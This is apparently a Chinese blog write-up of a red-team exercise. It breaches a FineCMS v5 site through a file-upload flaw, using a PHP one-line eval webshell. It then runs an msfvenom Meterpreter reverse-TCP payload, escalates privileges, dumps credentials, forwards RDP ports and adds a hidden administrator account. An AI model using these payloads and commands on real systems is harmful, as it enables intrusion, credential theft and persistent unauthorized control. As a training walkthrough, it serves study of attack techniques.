攻防演练-一次内网渗透

已于 2023-01-20 10:29:13 修改
阅读量547 收藏 6
点赞数 1
分类专栏: HW攻防演练 文章标签: 安全性测试 web安全 安全
于 2022-08-26 18:50:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lza20001103/article/details/126536175
版权

一次内网渗透

文章目录

webshell

访问某网站,该网站利用的是FineCMS v5系统建站,创建一个新的用户进行测试。
在这里插入图片描述
通过建站系统存在的漏洞进行webshell,利用FineCMS v5 的文件上传漏洞,获取官网系统的Webshell。

参考链接:https://blog.csdn.net/dfdhxb995397/article/details/101384946
在这里插入图片描述
上传一句话木马文件,并且通过burpsuite软件抓包来修改参数

<?php eval($_POST['v']); ?>

在这里插入图片描述
最开始的文件格式是0x0.png

通过burp代理拦截将tx后面的image/png换成image/php即可

图片

访问目标网站文件上传的路径,并且输入参数v=phpinfo();验证一句话木马是否上传成功
在这里插入图片描述
验证上传成功后,打开菜刀软件输入上传的网站路径和参数(一句话木马的密码),可以连接服务器在这里插入图片描述

getshell/提权

通过webshell连接目标服务器,但是访问的数据有限,仅仅是站点的系统账户权限,访问的系统路径也有限,于是我们可以编写免杀木马来进行反弹shell

在kali中生成反弹木马su.exe

Msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.10.130 lport=4444 -f exe >/root/Desktop/su.exe

在这里插入图片描述
利用刚刚webshell连接菜刀的操作,在文件管理模块中上传我们需要的工具ew.exe、lcx.exe、su.exe在这里插入图片描述
在kali中进入meterpreter攻击模块,配置参数监听端口在这里插入图片描述
利用菜刀软件的虚拟终端模拟win2008服务器点击免杀木马的操作,让木马生效
在这里插入图片描述
kali监听端口获取反弹shell,出现meterpreter模块代表获取成功,可以输入getsystem来提升权限
在这里插入图片描述
获取windows系统的登入密码(Administrator/Windows2008)
在这里插入图片描述
获取windows系统账号密码后,可以尝试远程登录目标电脑

如果win2008的远程桌面操作是不允许连接到这台计算机,那么开启端口转发也是没用的,如下所示

netstat -ano查看开放端口在这里插入图片描述
在这里插入图片描述
在kali的反弹shell模块先开启目标电脑的远程桌面run getgui -e

在这里插入图片描述
netstat -ano再次查看端口情况,发现3389远程端口开放在这里插入图片描述
然后在kali上开启端口转发,-l(本地端口)-p(远程控制端口)-r(目标主机)

目标主机可以通过模拟终端ipconfig指令查看ip地址,本机地址通过ifconfig查看ip地址

靶机3389端口转发发送到本地的5555端口portfwd add -l 5555 -p 3389 -r 192.168.10.10 (模拟目标主机)在这里插入图片描述
Rdesktop -u 用户名 -p 密码 127.0.0.1:5555 连接本地的5555端口开启远程桌面

本机kali输入rdesktop -u Administrator -p Windows2008 127.0.0.1:5555

可以看到linux接收到目标主机的远程登录界面在这里插入图片描述
当我们控制了目标主机,并且能够远程登录之后,就可以执行各种操作,并且权限为root权限。

可以增加新用户net user su su /add,加入系统组net localgroup Administrators su /add

可以上传上兴远控软件,方便本机系统远程登录目标主机在这里插入图片描述

总结

不同的操作系统可能存在版本漏洞、中间件漏洞、组件漏洞、端口服务漏洞等,在渗透测试的过程中可以通过信息收集来获取思路。

炫彩@之星
关注
专栏目录
内网渗透-Linux内网渗透
lza20001103的博客
08-16 1772
内网渗透-Linux内网渗透
掌握内网渗透之道,成为实战高手,看《内网渗透实战攻略》就够了
等风来
01-10 3019
当今,网络系统面临着越来越严峻的安全挑战。在众多的安全挑战中,一种有组织、有特定目标、长时间持续的新型网络攻击日益猖獗,国际上常称之为APT(Advanced Persistent Threat,高级持续性威胁)攻击。传统的渗透测试从外网发起攻击,并以攻破单台主机为目标。与之相比,APT攻击在技术上更加系统地实现了对目标内网主机的大批量控制,从而使业内对内网渗透技术的关注度提高到了一个空前的高度。
一次某单位的内网渗透测试
黑战士的博客
06-20 727
网卡信息、补丁信息、杀毒进程、用户在线情况、是否存在域、翻文件查找数据库密码、浏览器保存密码、查看路由等。使用越权加文件上传拿到shell。192.168.xx.x 管理员。通过哥斯拉上线msf。
一次内网渗透
wulanlin的博客
12-27 602
webshell 访问某网站,该网站利用的是FineCMS v5系统建站,创建一个新的用户进行测试。 通过建站系统存在的漏洞进行webshell,利用FineCMS v5 的文件上传漏洞,获取官网系统的Webshell。 上传一句话木马文件,并且通过burpsuite软件抓包来修改参数 <?php eval($_POST['v']); ?> 最开始的文件格式是0x0.png 通过burp代理拦截将tx后面的image/png换成image/php即可 访问.
Linux系统安全攻防实战——从入侵排查到加固及备份的全方位指南
最新发布
2401_84215240的博客
09-29 859
深度揭秘:Linux系统安全攻防实战——从入侵排查到加固及备份的全方位指南1 账号安全1.1 查看特权用户1.2 查询可登录用户1.3 查看sudo权限用户1.4 查看当前登录用户1.5 禁用或删除多余账号1.5.1 禁用账号1.5.2 删除账号及家目录2历史记录2.1 查看当前用户历史命令2.2 查看指定用户历史命令2.3 修改历史记录保存数量3 端口与进程3.1 查看端口连接情况3.1.1 确认没有未授权的网络连接。
一次简单的内网渗透
qq_42404383的博客
03-15 488
title:记一次简单的内网刷分(仅用于学习交流,请勿做非法操作) 文章目录title:记一次简单的内网刷分(仅用于学习交流,请勿做非法操作)前期:信息收集,外网打点信息收集:得到入口:中期:内网梳理,找寻域控内网信息收集域相关网段及存活IP端口扫描内网web探测等等后期:内网刷分,凭据窃取万能弱口令-刷分常见web漏洞-刷分常见操作系统漏洞-刷分==域凭据窃取-最终目的== 前期:信息收集,外网打点 信息收集: 旁站、c端、端口、域名、子域名、whois、web指纹、公众号、小程序、APP等 部分截图
安全学习】记一次内网环境渗透
kali_Ma的博客
11-21 2510
通过上述过程,我们对比如GPP,约束委派,SQLServer提权有了新的认知或者理解,网络安全的学习离不开实际操作,想要搞明白漏洞更是要实际去复现学习。
内网安全-记一次内网靶机渗透
kali_Ma的博客
02-24 6136
所涉及到的知识点: 1、WEB安全-漏洞发现及利用 2、系统安全-权限提升(漏洞&配置&逃逸) 3、内网安全-横向移动(口令传递&系统漏洞) 实战演练-ATT&CK实战系列-红队评估 环境下载: http://vulnstack.qiyuanxuetang.net/vuln/detail/9/ 利用资源: https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP https://github.com/briskets
内网渗透讲义-精选.zip
09-24
内容概括: 讲义详细介绍了内网渗透的基础知识、信息收集方法、内网渗透技术及工具使用。...- 安全测试攻防演练时的技术参考材料 - 安全工具使用教程,帮助安全人员进行内网渗透测试 - 网络安全竞赛中的实战指导资料
渗透测试攻防演练PDF.pdf
09-09
攻防演练是指一系列的测试和评估,以确保计算机系统或网络的安全性和可靠性。攻防演练项目实施包括攻防演练项目实施介绍、安全调查、交流、预演、演练实施、资产调查、安全状况调查、人员、组织和管理状况调查、技术...
攻防演练实战派|专题合集之攻防演练全流程
cdyunaq的博客
07-07 4559
攻防演练实战派-不要“演”就是“干”专题已经连续更新五期了,如果您也跟随我们的时间安排进行了备战准备,相信您也已经可以“安心待战”了吧!我们就来整体做一下回顾,既温习一遍备战细节,又可以再次进行备战巩固,看有无疏漏。第一步 ► :网络空间资产盘点,绘制网络空间写实地图,参考《网络空间资产盘点十大“避坑”指南》;第二步 ►:利用创宇蜜罐设陷,重塑网络空间地形,参考《纵深主动防御“修炼”手册,重塑网络空间地形》;第三步 ►:实时流量检测,强化全流量优势,参考《实时威胁响应“三全”计划》;第四步 ►:临战演练磨合
渗透测试攻防演练之间有什么区别
securitypaper的博客
07-04 1065
马上要开始攻防演练了,很多朋友不理解攻防演练与网络安全里面一直存在的渗透测试有啥区别,看起来都是给企业找问题,找漏洞以攻促防 其实个人感觉区别没有那么大,但既然是两个词或多或少还是有一些区别的,汇总大概如下 ...
一次靶机内网渗透
qq_64201116的博客
09-21 980
发现3389远程桌面连接端口是开放的,可是我们如果直接连接会发现是一个Windows2003的服务主机。那么有没有可能这个密码是相同的,因为都在同一个内网中,管理员可能是同一人。这样子就相当于10086端口在目标主机的服务器的内网中了,可以直接连接本地(直接连接内网地址)如果3389端口没有映射,除了拿下目标连接的路由器,还有一种方法:自己连接自己。这里的问题就是端口映射了,目标机的3389端口在公网的映射端口并不是3389。这里采用第三种方法。于此同时,我们需要一个代理软件来帮我们把py的数据给PHP。
一次内网渗透过程学习|天磊卫士
Uguardsec的博客
12-30 672
一次内网渗透过程学习
内网渗透演示(非常详细)零基础入门到精通,收藏这一篇就够了
Libra1313的博客
04-13 1342
接下来我们将尝试测试域控的漏洞,用的最多的是zerologon漏洞,顾名思义,该漏洞分为zero和logon两部分构成,意思就是将密码置空,然后登陆。一旦置空,则可以登录域控,但我们还不能直接登录,因为我们置空的不是administrator,接下来,我们使用minikatz通过机器账户ntml登录域控并读取域控管理员hash,这将是一条命令完成。在域控上线之后,我们必须马上恢复域控的机器账户密码,否则会导致域控脱域,这将是一条命令完成。窃取令牌后,代表我们与域控已经打通,我们将上传一个木马进域控c盘。
(原创)对某国的一次渗透
weixin_30493401的博客
09-30 213
文章均由自己原创,只是一直没有在自己博客发表。本地附件也没有了,我是从网上找来我的以前的投稿。 写在之前的废话:小菜技术能力不行,如果你觉得此文实在看不下去,还请PASS掉。如果你对我的文章有兴趣,可以与我一起交流。文章因为敏感无图,业内人士看看自然懂。 由于XXX耗时长,需要的支持多,而且目标敏感。在这里,我们不便介绍目标背景,也不多说其他的,直接来进入主题。 某国某目标,我盯了...
渗透测试基础 -内网渗透(上)
weixin_45488495的博客
05-09 832
渗透测试基础-内网渗透简介SQL注入写马Windows权限提升花生壳巧获公网IPew内网穿透实现端口转发探测内网机器提取本地管理员账号密码漏洞总结 只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力????! 简介 这里因为是复习关于内网的渗透,所以更多的是经过学习了解思路和操作步骤,那这里就直接进行靶场的演练,在过程中学习。 (因为所说内容风险较大,请在有合法授权的情况下进行渗透测试!!!) SQL注入写马 直接进入到这次的靶场页面。简单测试
攻防演练:渗透测试云上初体验
JulySec的博客
07-27 218
渗透测试本质还是在于信息收集,信息收集的越多,攻击面就越广,成功拿下主机的几率就越大。本文记一次对授权目标进行渗透时信息收集到目标站点下的一个子域名中存在信息泄露,从泄露的内容入手拿下云主机,实现云主机的接管,从而拿到管理所有阿里云资源的权限。
全面教程:内网渗透技巧与实战演练
进行内网渗透需要具备一定的网络知识、操作系统知识、安全攻防知识和编程能力。内网渗透的步骤一般包括信息收集、漏洞探测、权限提升和横向移动等。 1. 信息收集:信息收集是内网渗透的第一步,主要包括目标网络的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

炫彩@之星

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值